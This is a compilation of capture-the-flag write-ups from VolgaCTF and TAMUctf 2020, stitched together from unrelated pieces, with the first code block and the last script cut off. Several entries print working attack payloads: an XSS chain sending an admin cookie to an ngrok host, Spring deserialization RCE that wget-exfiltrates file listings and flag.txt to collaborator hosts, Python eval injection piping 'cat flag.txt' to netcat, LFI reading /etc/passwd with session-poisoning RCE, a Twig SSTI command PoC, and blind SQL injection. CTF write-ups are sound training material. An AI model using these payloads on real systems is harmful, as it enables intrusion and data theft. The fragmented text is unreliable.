```pythondef vm_run(program, io): io_idx = 0 reg = 0 mem = [0 for _ in range(10)] p = 0 pc = 0 buf = "" while pc < len(program): op = program[pc] if op == "+": reg += 1 elif op == "-": reg -= 1 elif op == "*": reg *= mem[p] elif op == "%": reg = mem[p] % reg elif op == "l": reg = mem[p] elif op == "s": mem[p] = reg elif op == ">": p = (p + 1) % 10 elif op == "<": p = (p - 1) % 10 elif op == ",": a = io[io_idx] io_idx += 1 if not a: reg = 0 else: reg += ord(a) elif op == "p": buf += str(reg) elif op == "[": if reg == 0: cnt = 1 while cnt != 0: pc += 1 if program[pc] == "[": cnt += 1 if program[pc] == "]": cnt -= 1 elif op == "]": if reg != 0: cnt = 1 while cnt != 0: pc -= 1 if program[pc] == "[": cnt -= 1 if program[pc] == "]": cnt += 1 elif op == "M": # print(mem) yield mem pc += 1 print(buf)
def main(): # cut from memory dumps expected = [ 4588277794174371330, 4557362566608270193, 4597225827500493308, 4399455111035409631, 3664679811648746944, 1822527803964528750, 2107290073593614393, 103104307719214561, 3773217954610171964, 1852072839260827083, 3465871536121230779, 223194874355517702, 1454204952931951837, 3030456872916287478, 426011771323652532, 1276028785627724173, 1962653697352394735, 1600956848133034570, 2045579747554458289, 4248193240456187641, 4478689482975263576, 1235692576284114044, 2579703272274331094, 1394874119223018380, 4275420194958799226, 2401030954359721279, 1313700932660640339, 2401701271938149070, 4217153612451355368, 2389747163516760623, 3483955087661197897, 4522489230881850831, ] program = "M+s+>s>++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[s<<l>*>l-]<<l-s>l*-s*-s*-s*-s*-s*-s>l*+++++s*-----s****s>>l+s[Ml-s<<l>,[<<*>>s<<<l>>>%>ll+s<l]>l]< |
The challenge URL is https://alternative.q.2020.volgactf.ru:7780/
The webpage just contains the text
>Hello there!Welcome to our first crypto challenge!Try to find some secret information here.
The site uses a selfsigned TLS certificate with the following content:
```Certificate: Data: Version: 3 (0x2) Serial Number: 2f:56:ad:4c:98:83:f7:73:92:5e:1a:d5:e7:62:bb:05:f4:a8:8e:e7 Signature Algorithm: sha256WithRSAEncryption Issuer: C = RU, ST = Samara, L = Samara, O = VolgaCTF, OU = CryptoGuys, CN = volgactf.ru Validity Not Before: Mar 7 05:46:24 2020 GMT Not After : Mar 7 05:46:24 2022 GMT Subject: C = RU, ST = Samara, L = Samara, O = VolgaCTF, OU = CryptoGuys, CN = volgactf.ru Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:ab:20:5a:46:08:db:71:4c:23:5a:3c:88:12:05: 84:94:e6:e3:43:c8:91:6d:d7:40:1d:a2:86:2c:a8: 46:c2:92:b7:2e:aa:5c:21:19:ce:b9:30:f8:d3:b3: b2:48:52:fa:92:57:86:0b:e0:9e:b3:9d:39:bc:35: 05:7d:94:f4:c0:10:42:0e:c2:3a:62:17:ec:5f:8c: a5:a2:ad:63:39:82:9c:74:f1:ae:6d:44:e4:dd:4a: c6:70:d9:15:86:e2:f8:df:09:62:4a:06:64:e8:21: 35:ac:60:31:54:97:3d:e1:ef:b1:1d:87:bc:56:c6: d6:26:87:7f:3a:b5:1a:2c:56:61:e7:da:a6:d6:4f: de:78:fe:73:07:e8:2e:2e:bd:74:d1:bf:45:65:c1: fa:d1:0c:b2:f6:90:63:43:6d:ec:cb:b5:6e:70:69: 00:7d:ca:f0:e5:77:20:b3:8d:c8:43:19:9f:23:bb: 98:0d:b2:ae:ea:40:09:14:2e:0b:5e:2f:83:b3:16: d3:1c:f0:a2:39:a4:67:c7:76:c3:8d:23:6f:a3:49: 41:64:ae:a5:6e:a4:4d:d1:09:a7:04:8b:00:78:ed: 84:da:7a:5c:0e:ab:3c:3a:ff:9c:34:2c:5a:8d:c9: ae:3f:e2:c1:3e:3f:db:da:80:ed:c6:06:ad:98:e6: a9:a5 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: Digital Signature, Non Repudiation, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication X509v3 Subject Alternative Name: DNS:www.volgactf.ru, DNS:s0.many.fields.in.certificate.com Signature Algorithm: sha256WithRSAEncryption 51:dd:0b:0c:90:e0:81:a9:c9:42:90:cf:72:59:cb:d3:98:e5: 1e:ec:96:ee:d4:e1:eb:98:56:69:32:46:16:80:99:4c:3f:41: ca:e2:e9:d9:7a:d8:a2:4d:eb:18:04:03:7b:a3:8e:c9:b5:e3: b7:b5:c6:33:b9:8d:ac:76:e5:be:15:4e:6d:b5:14:64:72:2e: 02:96:c2:e7:d8:df:91:69:f2:ec:5b:8d:c2:be:99:c9:58:6a: 08:36:02:07:83:31:c0:75:88:bb:4b:e9:e2:e5:49:ae:35:63: d4:7a:86:e7:78:73:cb:c3:db:3e:95:09:b9:b7:7a:9e:7a:77: da:2a:09:66:b9:6e:c8:cd:62:b6:da:82:fd:63:43:1f:e7:9d: 8a:71:bc:a2:8d:68:bf:35:10:03:a8:cf:54:a8:ea:72:b2:a3: cd:0c:7f:ce:6b:39:42:ad:45:c7:e6:28:6a:9b:3a:ab:45:8b: 47:df:f0:14:46:35:3c:b4:4f:ff:3b:62:4c:59:76:9a:2a:db: 98:97:57:f5:68:3e:32:f6:3a:45:7b:3f:c6:a2:45:79:f0:cf: f7:64:39:90:61:7c:0a:92:37:d7:6e:fe:65:40:71:56:7f:5b: b7:71:73:37:ab:82:22:3c:ee:8f:5c:48:1c:09:da:7a:5b:93: 6a:6a:a9:9e```
The second subject**Alternative**Name `s0.many.fields.in.certificate.com` looks interesting. After trying too many complicated things with it, I simply tried **VolgaCTF{s0.many.fields.in.certificate.com}** for the flag. |
# Dissolved
> Dissolved... Image... What does that even mean?!> > stego.png
For steganography challenges, a good first step is to use [Stegsolve](https://github.com/zardus/ctf-tools) to find any odd patterns in the image. By carefully looking at each bitplane, we'll notice there are a few different pixels in bits 0 and 2 of the alpha channel.
The hypothesis is that the flag data is hidden in these pixels. To make it easier to manipulate and experiment, let's get those pixels in Python:
```pythonfrom scipy import miscarr = misc.imread('stego.png')
pixels = []
for i in range(0, len(arr)): for j in range(0, len(arr[0])): if arr[i, j, 3] != 255: pixels.append(arr[i, j])```
The image is read as a multidimensional array, where `arr[5, 3, 0]` represents the red (`'RGBA'[0]`) value at position (3, 5). We copied to the `pixels` list every pixel where the alpha channel is not 255 (i.e. the weird pixels we found).
Let's analyze what we have: `len(pixels)` returns 312, which is divisible. by 8. Also, 312÷8 = 39, which is a reasonable size for a flag. Thus, each pixel might be hiding 1 bit of data, probably in the least significant bit (LSB). We don't know which channel contains the data, so let's get the LSB of each channel separately and see what we get:
```pythonr_bitstream = ''g_bitstream = ''b_bitstream = ''
for x in pixels: r_bitstream += str(x[0] & 1) g_bitstream += str(x[1] & 1) b_bitstream += str(x[2] & 1)
print('Red: ' + ''.join(chr(int(r_bitstream[i*8:i*8+8],2)) for i in range(len(r_bitstream)//8)))print('Green: ' + ''.join(chr(int(g_bitstream[i*8:i*8+8],2)) for i in range(len(g_bitstream)//8)))print('Blue: ' + ''.join(chr(int(b_bitstream[i*8:i*8+8],2)) for i in range(len(b_bitstream)//8)))```
And here's the result:
```Red: JP±j?£Ò¹2íÞep?F¼ NmüåÛ'÷ÏQ·ðAGreen: ?-Â`zHý5Ë¡Ò?ø3òyE?&z¸%Ï*ÅÁÊ9QxØâ]PØßABlue: VolgaCTF{Tr@nspar3ncy_g1ves_fLag_aw@y!}```
Flag: `VolgaCTF{Tr@nspar3ncy_g1ves_fLag_aw@y!}` |
# NonameI have Noname; I am but two days old.
[encrypted](encrypted) [encryptor.py](encryptor.py)
It got two files:- encrypted (Flag that is encrypted)- encryptor.py (Script that used to encrypt the flag)
encryptor.py:```python# Take current timestamp and convert to md5 hashkey = md5(str(int(time.time()))).digest() # Add padding to the flag string because it uses AES encryptionpadding = 16 - len(flag) % 16aes = AES.new(key, AES.MODE_ECB)# Encrypt the flagoutData = aes.encrypt(flag + padding * hex(padding)[2:].decode('hex'))# Convert to Base64print outData.encode('base64')```
This challenge is to brute force the timestamp, its easy to brute force because the **timestamp not a large number and it converted to an integer**
Also the range of number brute force is less because the challenge description say so: **I am but two days old**
I wrote a [python script](decrypt.py) to brute force:```pythonflag = open("encrypted",'r').read().decode("base64")i = 1t = int(time.time())while(1): # Minus the current timestamp with counter key = md5(str(t-i)).digest() aes = AES.new(key, AES.MODE_ECB) outData = aes.decrypt(flag) # If the decrypted data starts with the flag format if outData.startswith("VolgaCTF"): print outData break i += 1```## Flag```VolgaCTF{5om3tim3s_8rutf0rc3_i5_th3_345iest_w4y}``` |
# User Center
## Challenge
```Steal admin's cookie!https://volgactf-task.ru/
Category: WebPoints: 300Solved by: 34 of 1250 teams```
### Solution - Short versionExploit avatar image uploading to use Cross-site scripting. Upload URL to bug-report link, so admin navigates to it. Manipulate the cookie to the API URL, and redirect to main site. Request to API instead goes to our attacking server, and returns a javascript which is executed as JSONP. This script sends us the Admin cookies.
### Solution - Long version
> Disclaimer - I didn't manage to solve the task during the CTF, but did after reading the first official [russian writeup](https://translate.google.com/translate?depth=1&nv=1&rurl=translate.google.com&sl=auto&sp=nmt4&tl=en&u=https://blog.blackfan.ru/2020/03/volgactf-2020-qualifier-writeup.html%3Fm%3D1). I'm writing this to understand the missing pieces.>> \- Scalpel
On the site the user can upload a new avatar image for the profile, and there is a page where a user can upload a bug-report URL.
### Bug report link
I uploaded a link to my attacker site, and could see that the URL was hit within a minute. So most likely the Admin user will follow the link we upload.

The headers doesn't really expose anything useful, other than the fact we see the URL is called.
> #### Alternative to beeceptor > To quickly expose a local webserver on a public available random URL it is also possible to use> ```> python -m SimpleHTTPServer> ngrok http 8000> ```> This gives a temporary random URL, like `http://149a3dc7.ngrok.io`, and you can edit and serve the files you want.
### XSS for avatar upload
Next is to try to figure out how to exploit the fact that we can upload profile images.

Using Burpsuite I intercepted the POST request to the server, and see that it sends a JSON structure to the server consisting of an `avatar` (which is base64 of the filecontent, a `type` and a `bio`.)

If `type` contains the words `html` or `xml` the upload is denied by the API.
It is possible to manipulate the `type` via Burpsuite, so that you can upload any arbitrary file content to the server.
> #### Tip > In Burpsuite it is convenient to rightclick the request in the history, and choose "Send to Repeater". Then you can fiddle with the request, and send it over and over again for quick'n'easy testing.
When navigating to the `/profile.html` page there was an `img` tag there that referenced the file and type we uploaded. Inspecting the network traffic in Firefox was useful to see that the data we uploaded was being downloaded.
Using trial and error I could see that the type could be set to `*/*`, which would later tell Firefox to guess the MIME-type by looking at the downloaded data.
For example, by setting the `avatar` to a base64 encoded version of `<script> alert('xss');</script>`, and navigating directly to the image URL we see it execute javascript.

Another example that worked was to use type `text/rdf` and avatar `<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(document.domain)</a:script>` (base64 encode it). That treats the content as XML, and executes the Javascript.
Ok, at this point we know that we have found a XSS bug, on the static.volgactf-task.ru subdomain.
### Getting admin Cookies

There are three sites relevant here. There is the main site `volgactf-task.ru`, the site where avatars are uploaded `static.volgactf-task.ru` and the api where data is stored, `api.volgactf-task.ru`. The first one is the one we're interested in getting Admins cookie for.
When navigating to the /profile.html page, we can notice a slight delay between the loading of the page, and username etc being populated. That is because the page uses jQuery to retrieve data from the API. Relevant code is found in the `/js/main.js` file.

When document has loaded it'll get the cookie called `api_server`, and using `replaceForbiden` function it'll try to make sure none has tampered with it.
Now, the idea is this - use the XSS scripting bug on the `static` site to update the `api_server` cookie. And then tell the browser to navigate to the main site. It'll then try to load data from our evil site instead, and than could lead to another XSS bug.
Here is the javascript uploaded in the `avatar` field, which is used by the first XSS.
```html<html><script>document.cookie="api_server=149a3dc7.ngrok.io\uc039callback\uc039\uc039q; path=/profile.html;domain=.volgactf-task.ru"; location="https://volgactf-task.ru/profile.html"</script></html>```
Notice that the api_server is being set to `149a3dc7.ngrok.io\uc039callback\uc039\uc039q`. The `\uc039` is a random weird unicode char which leads the browser to split the domain from the file part.
This image shows the base64-encoded javascript used.

Then I navigate to the /profile.html page, and retrieve the randomly generated URL for the avatar image, example `https://static.volgactf-task.ru/c19b7d931691bdee80623d2106ff3edf`
At this point we have changed the behavior of the main site. When it is supposed to retrieve info from the `api.volgactf-task-ru` site, it will instead contact our local server.
Lastly, we need to exploit another XSS bug.
jQuery.getJSON() is used in the `main.js` file when getting the JSON object which describes the user. But, by utilizing the [JSONP functionality in jQuery](https://learn.jquery.com/ajax/working-with-jsonp/) we can instead get it to execute a Javascript.
On our local server we can make a very simple `index.htm` file which only contains one line.
```javascriptlocation='https://149a3dc7.ngrok.io/?q=' + encodeURIComponent(document.cookie)```
This will cause the second XSS bug to grab the cookie from the main site, and send it to us.
The next step is to get the Admin to browse to it, and that is done by uploading the link to the avatar-URL in the Bug-report section.

Within a minute, the Admin will navigate to that URL, and the following flow happens.
1) Admin opens the `https://static.volgactf-task.ru/c19b7d931691bdee80623d2106ff3edf` URL2) Javascript is excuted which creates a new cookie for `api_server`, which points to our attacker server, and javascript redirects Admins browser to `https://volgactf-task.ru/profile.html`3) Browers loads the /profile.html page, and performs jQuery's getJSON() call to our server.4) Our server returns a Javascript instead of JSON.5) That Javascript is executed in Admins browser, and sends us the cookies.
On our local server we can see the request comes in

URL decoding that gives `flag=VolgaCTF_0558a4ad10f09c6b40da51c8ad044e16`, and then converted to the correct format `VolgaCTF{0558a4ad10f09c6b40da51c8ad044e16}` |
```
<html><head><title>Captain</title></head><body><script>flag=new XMLHttpRequest;flag.onload=function(){document.write(this.responseText)};flag.open("GET","file:///flag");flag.send();</script></body></html>``` |
# ▼▼▼TOO_MANY_CREDITS_2(Web:432pts,71/661=10.7%)▼▼▼
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)
---
## 【Aim for RCE with Java serialization】
Using BurpSuite Extender **Java Deserialization Scanner**
(Reference) `https://portswigger.net/bappstore/228336544ebe4e68824b5146dbbd93ae`
↓
It turns out to be `Spring serialization`
---
## 【Try and error】
Exploit `Spring` with BurpSuite Extender
↓
```○Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net" ⇒GET /×Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net --user-agent test" ⇒ No access△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/`echo 'test'`" ⇒GET /`echo△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/`echo test`" ⇒GET /`echo△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/`id`" ⇒GET /`id` ※Backquotes are treated as letters△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/$(id)" ⇒GET /$(id) ※$(id) are treated as letters△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/|id" ⇒GET /|id ※| are treated as letters×Spring2 "sleep 10;wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/sleep" ⇒ No access△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/sleep;sleep 10" ⇒GET /sleep;sleep ※; are treated as letters. Terminated by a `space`.```
↓
Some characters seem to be unusable.
---
## 【Finally】
Finally, I wrote a shell file to the server and executed the shell
↓
```○Spring2 "wget -P /tmp/ http://my_server/kaz.sh"○Spring2 "sh /tmp/kaz.sh"```
---
## 【exploit】
Create **the following file** and put it on **my_server**, and writable under `/tmp/` folder
↓
kaz5.sh```#!/bin/bashwget http://ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net/`ls|base64````
↓
Write the file obtained by wget in the `/tmp/` folder```Spring2 "wget -P /tmp/ http://my_server/kaz5.sh"```
---
Execute file```Spring2 "sh /tmp/kaz5.sh"```
↓ Access comes to my_server
```GET /YmluCmZsYWcudHh0CmxpYgo= HTTP/1.1Host: ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net```
↓
`YmluCmZsYWcudHh0CmxpYgo=`
↓ base64 decode
```binflag.txtlib```
---
## 【Get flag】
```#!/bin/bashwget http://ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net/`cat flag.txt|base64````
↓
```Spring2 "wget -P /tmp/ http://my_server/kaz10.sh"Spring2 "sh /tmp/kaz10.sh"```
↓ Access comes to my_server
```GET /Z2lnZW17ZGEkaF8zXzFzX0FfbDFmM3NlTmR9Cg== HTTP/1.1Host: ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net```
↓
`Z2lnZW17ZGEkaF8zXzFzX0FfbDFmM3NlTmR9Cg==`
↓ base64 decode
`gigem{da$h_3_1s_A_l1f3seNd}` |
# Against the Perfect discord Inquisitor 1, 2
### Prompt 1
You're on a journey and come to the Tavern of a Kingdom Enemy, you need to get information of a secret organization for the next quest. Be careful about the Inquisitor! He can ban you from this world.
TL;DR find the flag
[Kingdom Chall](https://discord.gg/fHHyU6g)
HINT: Title/Chall name
### Prompt 2
There is a mage in the tavern that reveals secrets from the place. He is friendly, so he can help you! Be careful about the Inquisitor! He can ban you from this world.
TL;DR use the bot to get the flag
[Kingdom Chall](https://discord.gg/fHHyU6g)
### Solution 1
Starting out, we clicked the link to [Kingdom Chall](https://discord.gg/fHHyU6g), and joined the discord. There, we identified a long stream of other people joining, as well as a bot account named `Gandalf`. `Gandalf`'s status reads:
> You're welcome~ Free reveals with command: $reveal_secret (channel.id) (message.id)
Obviously, we need to test this:
```lyellread$reveal_secret 688190172793536545 691089964401819759Gandalf [BOT]@everyone say hello to @Gandalf !```
Great! Looks like `Gandalf` will be our oracle for any messages that we have ID's for but cannot read ourselves. What's next?
Someone had a plugin enabled that saw there was a hidden channel on the Discord, with ID `688190289814618213`, with name `hidden-round-table`. We would have found this in our API search below, but this helped refine where we were headed wiht `Gandalf` and the API.
Now onto that hint: The challenge name is "Against the Perfect discord Inquisitor" - that makes acronym "API"... I know where this is going. We need to make some API request to get some information.
After quite a bit of looking (Discord, your docs suck big time!!), we came up with [this script](discord_bot.py) which will make a `GET` request to the API. We needed a token, too, and thankfully, GitHub user Tyrrrz provides [this guide](https://github.com/Tyrrrz/DiscordChatExporter/wiki/Obtaining-Token-and-Channel-IDs) to getting tokens and channel (and message and guild) ID's. Now we can work with that. We tried:- `/api/v6/channel/688190172793536545/messages`: returns all the messages - nothing new, as we can read all messages in that channel.- `/api/v6/channel/688190289814618213/messages`: returns not authorized to view messages in hidden channel - no suprise there.- `/api/v6/guilds/688190172793536536`: returns much of what we already knew about this guild- `/api/v6/guilds/688190172793536536/channels`: ```json[{"id": "688190172793536539", "type": 4, "name": "Kingdom", "position": 0, "parent_id": null, "guild_id": "688190172793536536", "permission_overwrites": [], "nsfw": false}, {"id": "688190172793536545", "last_message_id": "691368465201758319", "type": 0, "name": "tavern", "position": 0, "parent_id": "688190172793536539", "topic": "A place of business where people gather to drink alcoholic beverages and be served food, and in most cases, where travelers receive lodging.", "guild_id": "688190172793536536", "permission_overwrites": [{"id": "688190172793536536", "type": "role", "allow": 0, "deny": 2048}], "nsfw": false, "rate_limit_per_user": 0},
{"id": "688190289814618213", "last_message_id": "688214063595258088", "type": 0, "name": "hidden-round-table", "position": 1, "parent_id": "688190172793536539", "topic": "F#{The_Table_of_King_Arthur}", "guild_id": "688190172793536536", "permission_overwrites": [{"id": "688190172793536536", "type": "role", "allow": 0, "deny": 3072}, {"id": "688190424124227590", "type": "role", "allow": 3072, "deny": 0}], "nsfw": false, "rate_limit_per_user": 0}]```
That's the first flag! `F#{The_Table_of_King_Arthur}` - the description of `#hidden_round_table`! Now onto the next one...
### Solution 2
We have not even used `Gandalf` yet, so we will need to. The output above tells us something interesting (and exactly what we need to use `Gandalf`) - the last message id in `#hidden_round_table`: `688214063595258088`. Now we can ask our "Mage" `Gandalf` about this:
```lyellread$reveal_secret 688190289814618213 688214063595258088Gandalf [BOT] RiN7UzRiM1JfMTVfVGgzX0sxbmdfQXJ0aHVyfQ==```
That looks like base64... One sec, [we can fix that](https://www.base64decode.org/), and we get `F#{S4b3R_15_Th3_K1ng_Arthur}`!
Thank you Fireshell Team and @K4L1!!
~Lyell Read, Phillip Mestas, Robert Detjens |
# Excellent CrackmeWe know one can do pretty much everything in Excel spreadsheets, but this...
[excel_crackme](VolgaCTF_excel_crackme.xlsm)
Open the excel file:
Unzipping the xlsm file and decompiled the vba source code using `pcode2code`:```pcode2code xl/vbaProject.bin -o decompile```Analyse the code, only **VolgaCTF function** is important for finding the flag
```vb6Private Sub VolgaCTF()Dim input As StringDim solution As LongDim number As LongDim answer As Longinput = Range("L15") 'L15 is the flag input box cell For i = 1 To Len(input) 'i will loop to 1 to length of input solution = 0 For j = 1 To Len(input) 'j will loop to 1 to length of input 'Get the value of cell and assign into number number = CInt(Cells(99 + i, 99 + j).Value) 'Get a character from input from index j c = Mid(input, j, 1) 'Add the number times the ASCII value of c to solution solution = solution + number * Asc(c) Next j 'Get the value of cell and assign to answer answer = CLng(Cells(99 + i, 99 + Len(input) + 1).Value) 'If answer not equal solution means wrong flag If (answer <> solution) Then MsgBox "Wrong Flag!" Exit Sub End IfNext i'Only if all answer equal to all solution then the flag is correctMsgBox "Congratz"End Sub```After I reversing the code, immediately found a secret number table starts at (CV,100), because of `Cells(99 + i, 99 + j)` and `i` `j` starts at 1

It is a `45*46` table, and I notice last column of the table is quite large compared to other number:

After more deep analysing, I found these are **Simultaneous equations!**```Assume abcdefgh (unknown) is the input charactersFirst row:620a +340b +895c -39d +945e +321f +586g +487h... = 490493Second row:-19a +85b -456c +228d -127e -777f +191g +605h... = -7845etc```Therefore, the flag length must be 45 (45 column)
I decide to use `z3 solver` in python to solve this:```pyfrom z3 import *n = 45inp = [Int('inp%i' %i) for i in range(n)]numbers = [i.strip().split(" ") for i in open("numbers.txt",'r').read().split("\n")]solver = Solver()solver.add(inp[0] == ord("V"))solver.add(inp[1] == ord("o"))solver.add(inp[2] == ord("l"))solver.add(inp[3] == ord("g"))solver.add(inp[4] == ord("a"))solver.add(inp[5] == ord("C"))solver.add(inp[6] == ord("T"))solver.add(inp[7] == ord("F"))solver.add(inp[8] == ord("{"))for i in range(9,45): solver.add(inp[i] >= 32) solver.add(inp[i] <= 126) solver.add(inp[44] == ord("}"))for i in range(44): condition = "" for j in range(n): condition += "("+ numbers[i][j] + "* inp[%i])+" % j solver.add(eval(condition[:-1] + "==" + numbers[i][n]))print(solver.check())modl = solver.model()print(''.join([chr(modl[inp[i]].as_long()) for i in range(n)]))```It took around 2 minutes to solve:```time python solve2.pysatVolgaCTF{7h3_M057_M47h_cr4ckM3_y0u_3V3R_533N}
real 1m41.494suser 1m41.331ssys 0m0.095s```## Flag```VolgaCTF{7h3_M057_M47h_cr4ckM3_y0u_3V3R_533N}```
## Better SolutionAfter the CTF ends, I saw better solution that can solve faster:[Unhappi writeups](https://ilovectf.github.io/jekyll/update/2020/03/29/Volga.html#excellent-crackme-150-points)[Better solution](solve3.py)
It use matrix to solve like the picture below: |
# MENTALMATH Writeup
### TAMUctf 2020 - Web 262
> My first web app, check it out!> > http://mentalmath.tamuctf.com>> Hint: I don't believe in giving prizes for solving questions, no matter how many!
#### Python code injection
- Math problem can be forged at userside.- Changed problem to `1 + 2 + 3` and sent `6`. Correct.- Invalid problem such as `&DN` gives 500 response code.- Guess serverside uses some kind of `eval()` function.- Let problem be `len('1234')` and sent `4`. Correct!- It seems python!- Listen by `nc -lvp [PORT]` on my local server.- Make math problem `__import__('os').system('ls | nc [IP] [PORT]')`. Received output:
```db.sqlite3flag.txtmanage.pymathgamementalmathrequirements.txt```
- Python confirmed.- Make math problem `__import__('os').system('cat flag.txt | nc [IP] [PORT]')` to get flag:
```gigem{1_4m_g0od_47_m4tH3m4aatics_n07_s3cUr1ty_h3h3h3he}```
- I also read `manage.py` because I was curious about server side operation. `manage.py` src:
```python#!/usr/bin/env pythonimport osimport sys
if __name__ == '__main__': os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mentalmath.settings') try: from django.core.management import execute_from_command_line except ImportError as exc: raise ImportError( "Couldn't import Django. Are you sure it's installed and " "available on your PYTHONPATH environment variable? Did you " "forget to activate a virtual environment?" ) from exc execute_from_command_line(sys.argv)``` |
# FILESTORAGE Writeup
### TAMUctf 2020 - Web 122
> Try out my new file sharing site!>> http://filestorage.tamuctf.com
#### LFI
I notice file path can be controlled by user. Check LFI by trying to read `/etc/passwd`.
- `http://filestorage.tamuctf.com/index.php?file=../../../../../etc/passwd`
```root:x:0:0:root:/root:/bin/ash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin```
LFI triggered.
#### php session poisoning
Check the cookie and get `PHPSESSID`. Session exist at `sess_{PHPSESSID}`. The service is maintained by using session. From [https://github.com/w181496/Web-CTF-Cheatsheet#php-session](https://github.com/w181496/Web-CTF-Cheatsheet#php-session). To trigger php session poisoning, I need to find where the session file exists. Guessing!
- `http://filestorage.tamuctf.com/index.php?file=../../../../../tmp/sess_5lpmadkrnrft9a18hbbrshrond`
Find where session is located by using LFI. Set user name as ``. Use LFI to access session file and trigger session poisoning.
#### RCE
Set GET paramter `command` to get RCE. Access session file to get command output. Guess where flag is.
- `http://filestorage.tamuctf.com/index.php?file=../../../../../tmp/sess_5lpmadkrnrft9a18hbbrshrond&command=cat%20../../../../flag_is_here/flag.txt`
I read flag:
```gigem{535510n_f1l3_p0150n1n6}``` |
# Instagram Writeup
### TAMUctf 2020 - Misc 50
#### Fix JPEG file
Similar writeup: [SECCON CTF 2017: JPEG File](https://www.pwndiary.com/write-ups/seccon-ctf-2017-jpeg-file-write-up-forensics100/). My goal is to fix jpeg marker. To detect JPEG error, I used [gimp](https://www.gimp.org/downloads/). Locate error by observing the output of gimp, such as:
```(gimp:27558): GLib-GObject-WARNING **: 23:55:03.929: g_object_set_is_valid_property: object class 'GeglConfig' has no property named 'cache-size'JPEG image-Warning: Corrupt JPEG data: 1602 extraneous bytes before marker 0xfe
JPEG image-Warning: JPEG datastream contains no image
GIMP-Error: Opening failed: JPEG image plug-In could not open image```
Use vim with xxd to patch each marker error. `vim -b binaryfile`, `:%!xxd`, `:%!xxd -r`. After five attempts, I get readable image and get flag:
```gigem{cH4nG3_the_f0rMaTxD}```

Original broken image: [photo.jpg](photo.jpg)
Result of trials to get readable image: [photo2.jpg](photo2.jpg), [photo3.jpg](photo3.jpg), [photo4.jpg](photo4.jpg)
Final output: [photo5.jpg](photo5.jpg) |
Vulnerable function:``` public function subscribe(Request $request, MailerInterface $mailer) { $msg = ''; $email = filter_var($request->request->get('email', ''), FILTER_VALIDATE_EMAIL); if($email !== FALSE) { $name = substr($email, 0, strpos($email, '@'));
$content = $this->get('twig')->createTemplate( "Hello ${name}.Thank you for subscribing to our newsletter.Regards, VolgaCTF Team" )->render();
Hello ${name}.
Thank you for subscribing to our newsletter.
Regards, VolgaCTF Team
$mail = (new Email())->from('[email protected]')->to($email)->subject('VolgaCTF Newsletter')->html($content); $mailer->send($mail);
$msg = 'Success'; } else { $msg = 'Invalid email'; } return $this->render('main.twig', ['msg' => $msg]); }``` RCE PoC: `email="{{['cat${IFS}/etc/passwd']|filter('system')}}"@your.domain` |
# TAMUctf 2020 – PASSWORD_EXTRACTION
* **Category:** web* **Points:** 50
## Challenge
> The owner of this website often reuses passwords. Can you find out the password they are using on this test server?> > http://passwordextraction.tamuctf.com> > You do not need to use brute force for this challenge.
## Solution
The website contains only a login form that is vulnerable to SQL injection.
```POST /login.php HTTP/1.1Host: passwordextraction.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 75Origin: http://passwordextraction.tamuctf.comConnection: closeReferer: http://passwordextraction.tamuctf.com/Upgrade-Insecure-Requests: 1
username=foo&password=foo%27%20OR%201%3D1%20AND%20username%20LIKE%20%27a%25
HTTP/1.1 200 OKServer: nginx/1.16.1Date: Sat, 21 Mar 2020 18:00:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 72Connection: closeVary: Accept-Encoding
You've successfully authorized, but that doesn't get you the password.```
Modifying the SQL injection query you will discover that the password is the flag.
```POST /login.php HTTP/1.1Host: passwordextraction.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 82Origin: http://passwordextraction.tamuctf.comConnection: closeReferer: http://passwordextraction.tamuctf.com/Upgrade-Insecure-Requests: 1
username=foo&password=foo%27%20OR%201%3D1%20AND%20password%20LIKE%20%27gigem%7B%25
HTTP/1.1 200 OKServer: nginx/1.16.1Date: Sat, 21 Mar 2020 18:02:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 72Connection: closeVary: Accept-Encoding
You've successfully authorized, but that doesn't get you the password.```
You can write a [Python script](https://github.com/m3ssap0/CTF-Writeups/raw/master/TAMUctf%202020/PASSWORD_EXTRACTION/password-extraction-solver.py) to easily exfiltrate all password chars via blind SQL injection.
```pythonimport requestsimport stringimport time
